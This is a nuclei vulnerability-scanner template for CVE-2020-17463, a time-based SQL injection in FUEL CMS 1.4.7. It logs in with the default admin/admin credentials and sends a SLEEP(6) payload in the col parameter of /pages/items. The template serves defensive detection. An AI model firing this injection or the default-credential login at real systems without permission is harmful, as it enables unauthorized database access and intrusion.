nuclei-templates/http/cves/2020/CVE-2020-17463.yaml

id: CVE-2020-17463

info:
  name: time based sqli
  author: Thirukrishnan
  severity: high
  description: |
    FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.    
  remediation: Fixed in version 115
  reference:
    - https://www.exploit-db.com/exploits/48741
  classification:
    cve-id: CVE-2020-17463
  tags: sqli,timebased

http:
  - raw:
      - |
        GET /fuel/index.php/fuel HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: http://{{Hostname}}/fuel/index.php/fuel/login/5a6e566c62413d3d
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1        

      - |
        POST /fuel/index.php/fuel/login/5a6e566c62413d3d HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 67
        Connection: close
        Referer: http://{{Hostname}}/fuel/index.php/fuel/login/5a6e566c62413d3d
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1

        user_name=admin&password=admin&Login=Login&forward=5a6e566c62413d3d        

      - |
        GET /fuel/index.php/fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        X-Requested-With: XMLHttpRequest
        Connection: close 
        Referer: http://{{Hostname}}/fuel/index.php/fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0
        Sec-Fetch-Mode: cors
        Sec-Fetch-Site: same-origin        

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 302'
          - 'status_code_2 == 302'
          - 'status_code_3 == 200'
          - 'contains(body_3, "No data to display")'
          - 'duration>=6'
        condition: and